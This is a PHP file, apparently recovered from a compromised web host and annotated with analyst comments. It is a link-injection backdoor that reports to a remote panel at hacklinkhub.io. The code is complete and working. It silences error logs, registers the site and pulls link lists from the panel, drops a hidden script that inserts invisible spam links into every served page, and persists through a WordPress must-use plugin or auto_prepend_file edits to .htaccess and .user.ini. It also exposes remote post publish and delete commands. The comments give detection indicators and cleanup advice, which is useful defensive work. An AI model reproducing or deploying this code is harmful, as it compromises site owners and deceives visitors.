File: /home/iddeczhh/public_html/agent.php
<?php
// Liveness probe: a request carrying a `check` query parameter is answered with
// the fixed marker './Done' and the script stops before any other logic runs.
// No key or signature is checked on this path, so the marker string is a usable
// signature when triaging a host or reviewing HTTP responses.
if (isset($_GET['check'])) {
echo './Done';
exit(0);
}
// Compatibility shim: define the two JSON flag constants only when the runtime
// does not already provide them. They are consumed by the json_encode() call
// that writes the link cache near the end of the script.
if (!defined('JSON_UNESCAPED_UNICODE')) {
define('JSON_UNESCAPED_UNICODE', 256);
}
if (!defined('JSON_UNESCAPED_SLASHES')) {
define('JSON_UNESCAPED_SLASHES', 64);
}
// Fallback hash() for runtimes where the function is missing.
//   $algo       - algorithm name, lower-cased before dispatch
//   $data       - input bytes
//   $raw_output - true: raw digest bytes; false: hex string
// Supports md5 and sha1 directly, and sha256 through openssl_digest() or
// mhash(). Anything else raises E_USER_WARNING and returns false.
if (!function_exists('hash')) {
function hash($algo, $data, $raw_output = false)
{
$algo = strtolower($algo);
switch ($algo) {
case 'md5':
$hash = md5($data);
return $raw_output ? pack('H*', $hash) : $hash;
case 'sha1':
$hash = sha1($data);
return $raw_output ? pack('H*', $hash) : $hash;
case 'sha256':
// Preferred backend: OpenSSL returns hex here, converted to raw on request.
if (function_exists('openssl_digest')) {
$hash = openssl_digest($data, 'sha256', false);
return $raw_output ? pack('H*', $hash) : $hash;
}
// Second backend: mhash returns raw bytes, converted to hex on request.
if (function_exists('mhash') && defined('MHASH_SHA256')) {
$raw = mhash(MHASH_SHA256, $data);
return $raw_output ? $raw : bin2hex($raw);
}
trigger_error('hash(): sha256 is not supported on this PHP server', E_USER_WARNING);
return false;
default:
trigger_error('hash(): Unsupported algorithm: ' . $algo, E_USER_WARNING);
return false;
}
}
}
// Fallback hash_algos(): lists the algorithms the fallback hash() can serve.
// NOTE(review): sha256 is advertised whenever mhash() exists, while the fallback
// hash() additionally requires MHASH_SHA256 to be defined, so the list can
// name an algorithm that hash() then rejects with false.
if (!function_exists('hash_algos')) {
function hash_algos()
{
$algos = array('md5', 'sha1');
if (function_exists('openssl_digest') || function_exists('mhash')) {
$algos[] = 'sha256';
}
return $algos;
}
}
// Fallback hash_hmac(): keyed digest built from hash() with a fixed 64-byte
// block size (key hashed down when longer than the block, zero-padded, then
// XORed with the 0x36 / 0x5c pads around an inner and an outer hash).
//   Returns hex by default, raw bytes when $raw_output is true, and false with
//   an E_USER_WARNING when $algo is not in hash_algos().
// NOTE(review): the results of the hash() calls are not checked; if hash()
// returns false the value is fed into the next step unchanged.
if (!function_exists('hash_hmac')) {
function hash_hmac($algo, $data, $key, $raw_output = false){
$algo = strtolower($algo);
if (!in_array($algo, hash_algos())) {
trigger_error('hash_hmac(): Unknown hashing algorithm: ' . $algo, E_USER_WARNING);
return false;
}
$block_size = 64;
if (strlen($key) > $block_size) {
$key = hash($algo, $key, true);
}
$key = str_pad($key, $block_size, chr(0x00));
$ipad = str_repeat(chr(0x36), $block_size);
$opad = str_repeat(chr(0x5c), $block_size);
$inner = hash($algo, ($key ^ $ipad) . $data, true);
$hmac = hash($algo, ($key ^ $opad) . $inner, true);
return $raw_output ? $hmac : bin2hex($hmac);
}
}
// Fallback http_response_code(): remembers the status in a static variable and,
// when a code is passed and headers are not yet sent, emits the status line.
//   $code - status to set, or null to only read the remembered value
//   Returns the remembered status (200 until one is set).
if (!function_exists('http_response_code')) {
function http_response_code($code = null){
static $currentCode = 200;
if ($code !== null) {
$currentCode = (int)$code;
// Reason phrases for a fixed subset of codes; any other code gets ''.
$texts = array(
100 => 'Continue',
101 => 'Switching Protocols',
200 => 'OK',
201 => 'Created',
202 => 'Accepted',
204 => 'No Content',
301 => 'Moved Permanently',
302 => 'Found',
303 => 'See Other',
304 => 'Not Modified',
307 => 'Temporary Redirect',
400 => 'Bad Request',
401 => 'Unauthorized',
403 => 'Forbidden',
404 => 'Not Found',
405 => 'Method Not Allowed',
500 => 'Internal Server Error',
501 => 'Not Implemented',
502 => 'Bad Gateway',
503 => 'Service Unavailable'
);
$text = isset($texts[$currentCode])
? $texts[$currentCode]
: '';
// The status line is rebuilt from $_SERVER['SERVER_PROTOCOL']; the header
// is skipped silently once output has started.
if (!headers_sent()) {
header(
$_SERVER['SERVER_PROTOCOL'] .
' ' .
$currentCode .
' ' .
$text,
true,
$currentCode
);
}
}
return $currentCode;
}
}
// Fallback random_bytes() for runtimes without the native function.
//   $length - number of bytes wanted; must be an int >= 1
//   Returns $length bytes, or false with an E_USER_WARNING on a bad length.
// Sources are tried in order: OpenSSL, /dev/urandom, then a hash-based filler.
if (!function_exists('random_bytes')) {
function random_bytes($length){
if (!is_int($length) || $length < 1) {
trigger_error('random_bytes(): Length must be a positive integer', E_USER_WARNING);
return false;
}
if (function_exists('openssl_random_pseudo_bytes')) {
// NOTE(review): $strong is filled in by OpenSSL but never inspected, so
// output flagged as not cryptographically strong is still accepted.
$strong = false;
$bytes = openssl_random_pseudo_bytes($length, $strong);
if ($bytes !== false && strlen($bytes) === $length) {
return $bytes;
}
}
if (@is_readable('/dev/urandom')) {
$h = @fopen('/dev/urandom', 'rb');
if ($h) {
$bytes = fread($h, $length);
fclose($h);
if ($bytes !== false && strlen($bytes) === $length) {
return $bytes;
}
}
}
// Last resort: md5 over uniqid(), mt_rand(), microtime() and the serialized
// $_SERVER array. None of these inputs is a secure random source, so values
// produced by this branch (the script uses random_bytes() for its request
// nonces) must not be treated as unpredictable.
$bytes = '';
while (strlen($bytes) < $length) {
$bytes .= pack(
'H*',
md5(
uniqid(mt_rand(), true) .
microtime(true) .
serialize($_SERVER)
)
);
}
return substr($bytes, 0, $length);
}
}
// Derive a base directory from the current request URI.
// The URI is normalised (repeated slashes collapsed, query string dropped), its
// '/' characters are counted, and the function climbs one '../' from the current
// working directory for every slash beyond the first, then resolves the result
// with realpath(). Presumably this is meant to land on the site's document root
// regardless of how deep the script sits; verify against the deployment.
// Analyst note: every file this script creates is placed relative to this
// value, and the value follows the request path rather than a fixed location.
// When cleaning a host, look for the dropped dotfiles in ancestor directories
// of the script as well as beside it.
// Returns the resolved path, or false when realpath() cannot resolve it.
function www_root(){
$REQUESTURI = strval($_SERVER['REQUEST_URI']);
while(strstr($REQUESTURI, '//')){
$REQUESTURI = str_replace('//', '/', $REQUESTURI);
}
if(strstr($REQUESTURI, '?')){
$REQUESTURI = explode('?', $REQUESTURI);
$REQUESTURI = $REQUESTURI[0];
}
$xRoot = substr_count($REQUESTURI, '/');
$root = './';
$counter = 1;
while($counter < intval($xRoot)){
$root .= '../';
$counter++;
}
return realpath($root);
}
// Log suppression: error reporting, the error log target, error logging and
// error display are all switched off, so failures in this script leave no
// entries in the PHP error log. Absence of log lines is therefore not evidence
// that the script has not run; rely on web access logs and file timestamps.
error_reporting(0);
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('display_errors', 0);
// Hard-coded remote control endpoint. Every outbound request made below goes to
// this base URL; it is the network indicator for egress and DNS log searches.
$panelBase = "https://hacklinkhub.io/panel/api/site";
// On-disk artefacts, both hidden dotfiles under www_root():
//   .site_agent.json - registration response holding site_key / site_secret
//   .site_links.json - cached list of links to inject into served pages
$configFile = www_root().'/.site_agent.json';
$linkCache = www_root().'/.site_links.json';
$root = www_root();
// `debug` query parameter switches out() and the final status line to verbose.
$debug = isset($_GET['debug']);
// Fingerprint endpoint: a request with `panel_check` gets a JSON document with
// a fixed status, the host name taken from the Host header, the agent version
// string '4.1' and the PHP version. No key or signature is required, so the
// response shape identifies an installed copy of this script.
if (isset($_GET['panel_check'])) {
header('Content-Type: application/json');
echo json_encode(array(
'status' => 'online',
'domain' => (isset($_SERVER['HTTPS'])?'https://':'http://').$_SERVER['HTTP_HOST'],
'agent_version' => '4.1',
'php_version' => PHP_VERSION,
));
exit;
}
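/**
 * Report whether $FullStr ends with $needle (byte-wise, case-sensitive).
 *
 * The comparison is strict. The previous loose `==` treated two numeric-looking
 * strings as equal when their numeric values matched (for example '100' and
 * '1e2'), which is not a suffix test.
 *
 * @param string $FullStr String to inspect.
 * @param string $needle  Suffix to look for; the empty string always matches.
 * @return bool True when $FullStr ends with $needle.
 */
function endsWith($FullStr, $needle) {
    // Cast first so non-string scalars keep comparing by their text form.
    $FullStr = (string)$FullStr;
    $needle = (string)$needle;
    $needleLen = strlen($needle);
    if ($needleLen === 0) {
        return true;
    }
    // A suffix longer than the string can never match; this also keeps the
    // negative substr() offset below within range.
    if ($needleLen > strlen($FullStr)) {
        return false;
    }
    return substr($FullStr, -$needleLen) === $needle;
}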
// Return the directory part of a '/'-separated path, built by hand.
//   $p1 - file path; a path without any '/' yields the current directory.
// Steps: collapse '//' once, drop one trailing '/', rejoin every component
// except the first and the last with '/', then restore a leading './' or '../'
// when the input started that way, and collapse '//' once more.
// NOTE(review): for the input '/' the trailing-slash strip leaves $p1 empty, so
// the $p1[0] / $p1[1] reads below are out of range; a two-character minimum is
// assumed but not enforced.
function folder_of_file($p1){
if(!stristr($p1, '/')){
return realpath('./');
}
if(strpos($p1, '//') !== false){
$p1 = str_replace('//','/',$p1);
}
if(endsWith($p1, '/') == true){
$p1 = substr_replace($p1 ,'', -1);
}
$p2 = '';
$ar = explode('/', $p1);
// Index 0 (text before the first '/') and the last component are skipped.
for($i=1; $i < count($ar) - 1; $i++){
$p2 .= '/'.$ar[$i];
}
if($p1[0] == '.' && $p1[1] == '/'){
$p2 = './'.$p2;
}
if($p1[0] == '.' && $p1[1] == '.'){
$p2 = '../'.$p2;
}
if(strpos($p2, '//') !== false){
$p2 = str_replace('//','/',$p2);
}
return trim($p2);
}
// Write $source to $path, loosening permissions first when needed.
//   Returns the result of file_put_contents() / fwrite(): bytes written, or
//   false on failure.
// Analyst note: on non-Windows hosts a non-writable parent directory is set to
// 0755 and a non-writable existing file to 0644 before the write. These mode
// changes are a side effect that persists after the script exits; unexpected
// permission or ctime changes on the web root, .htaccess or .user.ini are a
// useful timeline marker during an investigation.
function save($path, $source){
$os = strtolower(substr(PHP_OS, 0, 3));
$folder_P = folder_of_file($path);
if (!is_writable($folder_P) && $os != "win"){ chmod($folder_P, 0755); }
if (file_exists($path) && is_file($path) && !is_writable($path) && $os != "win"){ chmod($path, 0644); }
if(function_exists('file_put_contents')){
$saV = file_put_contents($path, $source);
}else{
// Fallback path: the handle returned by fopen() is neither checked nor closed.
$saV = fwrite(fopen($path, 'w'), $source);
}
return $saV;
}
// Read a whole file into a string, using whichever file API is available.
// The chain of function_exists() checks tries file_get_contents(), then
// fopen() + stream_get_contents(), then file() joined with implode(), then
// file() joined by a manual loop. Presumably this is meant to keep working
// when individual functions are disabled on the host; confirm against the
// target configuration.
//   Returns the file contents, '' when no reader is available, or whatever the
//   selected reader returns on failure (not checked here).
function read($path){
$contents = '';
if(function_exists('file_get_contents')){
$contents = file_get_contents($path);
}elseif(function_exists('fopen') && function_exists('stream_get_contents')){
$contents = stream_get_contents(fopen($path, "r"));
}elseif(function_exists('implode') && function_exists('file')){
$contents = implode(file($path));
}elseif(function_exists('file')){
// Reached only when implode() is missing, so the implode() branch below
// cannot be taken in practice.
$lines = file($path);
if(function_exists('implode')){
$contents = implode($lines);
}else{
foreach($lines as $line){
$contents .= $line;
}
}
}
return $contents;
}
// Status reporter used by the top-level flow.
//   $msg  - status token, echoed only when the global $debug flag is set
//   $stop - when true (the default) the script exits after the optional echo
// Without the `debug` query parameter a failing step therefore ends the request
// with an empty body, so response size alone does not show which step failed.
function out($msg,$stop=true){
global $debug;
if($debug) echo $msg."\n";
if($stop) exit;
}
// Outbound HTTP helper used for every call to the remote panel.
//   $url        - target URL
//   $headers    - list of 'Name: value' header lines (non-arrays are discarded)
//   $post       - true for POST, false for GET
//   $postFields - request body for POST, or null
//   Returns the response body, or false when the request fails or neither
//   cURL nor the stream wrapper is usable.
// Analyst notes:
//  - Certificate and host-name verification are disabled in both transports
//    (CURLOPT_SSL_VERIFYPEER / CURLOPT_SSL_VERIFYHOST, and verify_peer /
//    verify_peer_name), so the origin of a response is not authenticated at
//    the TLS layer.
//  - Unless the caller supplies one, the User-Agent header is copied from the
//    visitor's request, with a hard-coded browser string as fallback. Egress
//    rules keyed on a default cURL/PHP agent will not match this traffic;
//    match on the destination host instead.
//  - Redirects are followed, up to 5 hops, with a 20 second overall timeout.
function curlRequest($url, $headers = array(), $post = false, $postFields = null) {
$userAgent = isset($_SERVER['HTTP_USER_AGENT'])
? $_SERVER['HTTP_USER_AGENT']
: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36';
if (!is_array($headers)) {
$headers = array();
}
// Add a User-Agent header only when the caller did not pass one.
$hasUserAgent = false;
foreach ($headers as $h) {
if (stripos($h, 'User-Agent:') === 0) {
$hasUserAgent = true;
break;
}
}
if (!$hasUserAgent) {
$headers[] = 'User-Agent: ' . $userAgent;
}
// Transport 1: cURL, when curl_exec() is available.
if (function_exists('curl_exec')) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 20);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_MAXREDIRS, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
if ($post) {
curl_setopt($ch, CURLOPT_POST, true);
if ($postFields !== null) {
curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields);
}
}
$res = curl_exec($ch);
curl_close($ch);
return $res;
}
// Transport 2: file_get_contents() with an HTTP stream context.
if (function_exists('file_get_contents') && function_exists('stream_context_create')) {
if ($post && is_array($postFields)) {
$postFields = http_build_query($postFields);
}
if ($post && $postFields !== null) {
// Supply a form Content-Type unless the caller already set one, and
// always append Content-Length for the body.
$hasContentType = false;
foreach ($headers as $h) {
if (stripos($h, 'Content-Type:') === 0) {
$hasContentType = true;
break;
}
}
if (!$hasContentType) {
$headers[] = 'Content-Type: application/x-www-form-urlencoded';
}
$headers[] = 'Content-Length: ' . strlen($postFields);
}
$opts = array(
'http' => array(
'method' => $post ? 'POST' : 'GET',
'header' => implode("\r\n", $headers),
'timeout' => 20,
'ignore_errors' => true,
'follow_location' => 1,
'max_redirects' => 5
),
'ssl' => array(
'verify_peer' => false,
'verify_peer_name' => false
)
);
if ($post && $postFields !== null) {
$opts['http']['content'] = $postFields;
}
$context = stream_context_create($opts);
return @file_get_contents($url, false, $context);
}
return false;
}
// Guess the platform of the host site from marker files under www_root():
// wp-config.php -> 'wordpress', artisan -> 'laravel', config.php together with
// a catalog/ directory -> 'opencart', otherwise 'php'. The result is reported
// to the remote panel during registration.
function detectCMS(){
if(file_exists(www_root().'/wp-config.php')) return 'wordpress';
if(file_exists(www_root().'/artisan')) return 'laravel';
if(file_exists(www_root().'/config.php') && is_dir(www_root().'/catalog')) return 'opencart';
return 'php';
}
// Site identity reported to the panel, built from the request's Host header.
$domain = (isset($_SERVER['HTTPS'])?'https://':'http://').$_SERVER['HTTP_HOST'];
// Remote command: delete a WordPress post.
// Triggered by a POST field `delete_blog`. The caller must send an X-Site-Key
// request header equal to the site_key stored in .site_agent.json; a missing
// config file or a mismatch yields 403. This is the only check on this path,
// and the stored key is whatever the panel returned at registration.
// Analyst note: on success the post is removed with wp_delete_post(..., true),
// i.e. with the force-delete flag set. POST requests to this script in the
// access log are the trace to look for; the PHP error log will show nothing
// because logging is disabled earlier in the script.
if (isset($_POST['delete_blog'])) {
if (!file_exists($configFile)) {
http_response_code(403);
echo json_encode(array('ok' => false, 'error' => 'config_not_found'));
exit;
}
$cfg = json_decode(read($configFile), true);
$key = isset($_SERVER['HTTP_X_SITE_KEY']) ? (string)$_SERVER['HTTP_X_SITE_KEY'] : '';
if (empty($cfg['site_key']) || $key !== $cfg['site_key']) {
http_response_code(403);
echo json_encode(array('ok' => false, 'error' => 'unauthorized'));
exit;
}
if (!file_exists($root.'/wp-load.php')) {
echo json_encode(array('ok' => false, 'error' => 'not_wordpress'));
exit;
}
// Boots the full WordPress environment inside this request.
require_once $root.'/wp-load.php';
$remoteUrl = isset($_POST['remote_url']) ? trim((string)$_POST['remote_url']) : '';
$title = isset($_POST['title']) ? trim((string)$_POST['title']) : '';
// Resolve the target post: by URL first, then by exact title as a fallback.
$postId = 0;
if ($remoteUrl !== '') {
$postId = url_to_postid($remoteUrl);
}
if (!$postId && $title !== '') {
$post = get_page_by_title($title, OBJECT, 'post');
if ($post) {
$postId = (int) $post->ID;
}
}
if (!$postId) {
echo json_encode(array('ok' => false, 'error' => 'post_not_found'));
exit;
}
$deleted = wp_delete_post($postId, true);
if (!$deleted) {
echo json_encode(array('ok' => false, 'error' => 'delete_failed'));
exit;
}
echo json_encode(array('ok' => true));
exit;
}
// Remote command: publish a WordPress post.
// Triggered by a POST field `publish_blog`, gated by the same X-Site-Key header
// comparison against .site_agent.json as the delete command. The supplied title
// and content are inserted as a post of type 'post' with status 'publish', and
// the new permalink is returned to the caller.
// Analyst note: content is passed to wp_insert_post() as received, with no
// filtering in this script, and no WordPress user is logged in for the request.
// post_author is not set here, so such posts presumably carry no real author;
// verify in wp_posts. When auditing an affected site, review published posts
// for entries that no editor created.
if (isset($_POST['publish_blog'])) {
if (!file_exists($configFile)) {
http_response_code(403);
echo json_encode(array('ok' => false, 'error' => 'config_not_found'));
exit;
}
$cfg = json_decode(read($configFile), true);
$key = isset($_SERVER['HTTP_X_SITE_KEY']) ? (string)$_SERVER['HTTP_X_SITE_KEY'] : '';
if (empty($cfg['site_key']) || $key !== $cfg['site_key']) {
http_response_code(403);
echo json_encode(array('ok' => false, 'error' => 'unauthorized'));
exit;
}
if (!file_exists($root.'/wp-load.php')) {
echo json_encode(array('ok' => false, 'error' => 'not_wordpress'));
exit;
}
require_once $root.'/wp-load.php';
$title = isset($_POST['title']) ? trim((string)$_POST['title']) : '';
$content = isset($_POST['content']) ? (string)$_POST['content'] : '';
// Both fields are required; whitespace-only content is rejected.
if ($title === '' || trim($content) === '') {
echo json_encode(array('ok' => false, 'error' => 'invalid_payload'));
exit;
}
$postId = wp_insert_post(array(
'post_title' => $title,
'post_content' => $content,
'post_status' => 'publish',
'post_type' => 'post',
), true);
if (is_wp_error($postId)) {
echo json_encode(array('ok' => false, 'error' => $postId->get_error_message()));
exit;
}
echo json_encode(array('ok' => true, 'url' => get_permalink($postId)));
exit;
}
// First-run registration. When .site_agent.json does not exist yet, the script
// POSTs the site's domain and detected platform to the panel's /register
// endpoint and writes the raw response body to the config file without parsing
// or validating it. out() exits by default, so this request ends here on
// success or failure; the sync logic below runs only on later requests.
// Analyst note: the creation time of .site_agent.json marks the first
// execution of the script on the host.
if(!file_exists($configFile)){
$response = curlRequest(
$panelBase."/register",
array('Content-Type: application/x-www-form-urlencoded'),
true,
http_build_query(array(
'domain'=>$domain,
'cms'=>detectCMS()
))
);
if(!$response) out("REGISTER_FAILED");
save($configFile,$response);
out("REGISTERED");
}
// Sync with the panel. Runs on every request that reaches this point.
// The stored config must decode and contain site_key and site_secret,
// otherwise the script stops with INVALID_CONFIG.
$config = json_decode(read($configFile),true);
if(!$config || empty($config['site_key']) || empty($config['site_secret'])) out("INVALID_CONFIG");
$siteKey = $config['site_key'];
$siteSecret = $config['site_secret'];
// Step 1 - heartbeat. The request is signed with HMAC-SHA256 over
// "POST|<path>|<timestamp>|<nonce>" keyed by site_secret and sent with the
// key, timestamp, nonce, signature and domain as X-* headers. The response is
// ignored.
$timestamp = time();
$nonce = bin2hex(random_bytes(8));
$path = '/panel/api/site/heartbeat';
$sig = hash_hmac('sha256',"POST|$path|$timestamp|$nonce",$siteSecret);
curlRequest($panelBase."/heartbeat",array(
"X-SITE-KEY: $siteKey",
"X-TIMESTAMP: $timestamp",
"X-NONCE: $nonce",
"X-SIGNATURE: $sig",
"X-DOMAIN: $domain"
),true);
// Step 2 - fetch the link list. Signed the same way with method GET; the site
// key is also sent in the query string, so it appears in URL-level logs on
// any proxy that records full request URLs.
$timestamp = time();
$nonce = bin2hex(random_bytes(8));
$path = '/panel/api/site/config';
$sig = hash_hmac('sha256',"GET|$path|$timestamp|$nonce",$siteSecret);
$response = curlRequest($panelBase."/config?site_key=".$siteKey,array(
"X-SITE-KEY: $siteKey",
"X-TIMESTAMP: $timestamp",
"X-NONCE: $nonce",
"X-SIGNATURE: $sig"
));
if(!$response) out("CONFIG_FAILED");
// The response is accepted when it decodes to an array with a 'links' key.
// Only the outgoing requests are signed; nothing on the response is verified
// here, so the cached link list is entirely controlled by the remote side.
$data = json_decode($response,true);
if(!is_array($data) || !isset($data['links'])) out("INVALID_CONFIG_RESPONSE");
// Step 3 - overwrite the local cache (.site_links.json) on every sync.
save($linkCache,json_encode(array(
'version'=>isset($data['version']) ? $data['version'] : 1,
'updated_at'=>date('c'),
'links'=>$data['links']
),JSON_UNESCAPED_UNICODE|JSON_UNESCAPED_SLASHES));
// Drop the page-injection payload as a hidden file, .panel_render.php, unless
// it already exists. The payload is the string literal below, written verbatim.
// What the dropped file does when included:
//  - loads .site_links.json from its own directory and returns early when the
//    file is missing or has no links;
//  - registers an output-buffer callback that builds one <a> element per cached
//    link (url and anchor HTML-escaped) styled with font-size:1px, plus
//    display:none when the link's `hidden` field is set;
//  - inserts that markup before the first </body>, or appends it when the page
//    has no </body>.
// The `rel` value is computed in the payload but never placed in the anchor.
// Analyst note: the injected block is wrapped in the HTML comments
// "<!-- PANEL LINKS START -->" and "<!-- PANEL LINKS END -->". Searching served
// pages for those markers confirms active injection; the anchors themselves
// are effectively invisible in a rendered page.
$renderFile = $root.'/.panel_render.php';
if(!file_exists($renderFile)){
$renderCode = '<?php
$cache = __DIR__."/.site_links.json";
if(!file_exists($cache)) return;
$data = json_decode(file_get_contents($cache), true);
if(empty($data["links"])) return;
ob_start(function($buffer) use ($data){
$linksHtml = "\n<!-- PANEL LINKS START -->\n";
foreach($data["links"] as $l){
if(empty($l["url"]) || empty($l["anchor"])) continue;
$u = htmlspecialchars($l["url"], ENT_QUOTES);
$a = htmlspecialchars($l["anchor"], ENT_QUOTES);
$r = !empty($l["rel"]) ? htmlspecialchars($l["rel"]) : "dofollow";
$style = "font-size:1px;";
if(!empty($l["hidden"])) $style .= "display:none;";
$linksHtml .= "<a href=\"".$u."\" style=\"".$style."\">".$a."</a> ";
}
$linksHtml .= "\n<!-- PANEL LINKS END -->\n";
if(stripos($buffer, "</body>") !== false){
return preg_replace("/<\\/body>/i", $linksHtml."</body>", $buffer, 1);
}
return $buffer.$linksHtml;
});';
save($renderFile, $renderCode);
}
// Persistence on WordPress sites. When wp-load.php is present, the script makes
// sure wp-content/mu-plugins exists (creating it with mode 0755 if needed) and
// drops panel-links.php there unless the file already exists. The dropped
// plugin hooks `init` and includes .panel_render.php from ABSPATH on every
// WordPress request.
// Analyst note: must-use plugins are loaded by WordPress automatically and
// cannot be deactivated from the regular plugins screen, so this file has to be
// removed from disk. Deleting this script alone does not stop the injection;
// the mu-plugin, .panel_render.php and .site_links.json must go as well.
if(file_exists($root.'/wp-load.php')){
$muDir = $root.'/wp-content/mu-plugins';
if(!is_dir($muDir)) mkdir($muDir,0755,true);
$pluginPath = $muDir.'/panel-links.php';
if(!file_exists($pluginPath)){
save($pluginPath,'<?php
if(!defined("ABSPATH")) exit;
add_action("init",function(){
$f = ABSPATH.".panel_render.php";
if(file_exists($f)) include $f;
});');
}
}
// Persistence on non-WordPress sites: make PHP run .panel_render.php before
// every script through the auto_prepend_file directive, set in two places.
// Analyst note: both edits prepend one line to an existing file and are skipped
// when the file already mentions auto_prepend_file. Cleanup means removing the
// directive from .htaccess and .user.ini as well as deleting the render file;
// a leftover directive pointing at a deleted file can break every PHP request
// on the site. PHP caches .user.ini settings for a period, so confirm the
// change has taken effect before declaring the site clean.
if (!file_exists($root . '/wp-load.php')) {
// 1) .htaccess with php_value, attempted only when the SAPI name contains
//    'apache' and neither 'fcgi' nor 'cgi'.
$sapi = strtolower(php_sapi_name());
$canUseHtaccessPhpValue =
strpos($sapi, 'apache') !== false &&
strpos($sapi, 'fcgi') === false &&
strpos($sapi, 'cgi') === false;
if ($canUseHtaccessPhpValue) {
$htaccess = $root . '/.htaccess';
$line = 'php_value auto_prepend_file "' . $renderFile . '"';
if (!file_exists($htaccess)) {
save($htaccess, $line . PHP_EOL);
} else {
$c = read($htaccess);
if (strpos($c, 'auto_prepend_file') === false) {
save($htaccess, $line . PHP_EOL . $c);
}
}
}
// 2) .user.ini, written regardless of the SAPI check above.
$userIni = $root . '/.user.ini';
$userIniLine = 'auto_prepend_file="' . $renderFile . '"';
if (!file_exists($userIni)) {
save($userIni, $userIniLine . PHP_EOL);
} else {
$c = read($userIni);
if (strpos($c, 'auto_prepend_file') === false) {
save($userIni, $userIniLine . PHP_EOL . $c);
}
}
}
// Final status line. A completed sync answers with the bare token SYNC_OK, or
// with "AGENT OK" and the number of cached links when `debug` is set. Either
// string in an HTTP response body indicates a working install of this script.
echo $debug ? "AGENT OK\nLinks: ".count($data['links'])."\n" : "SYNC_OK";
?>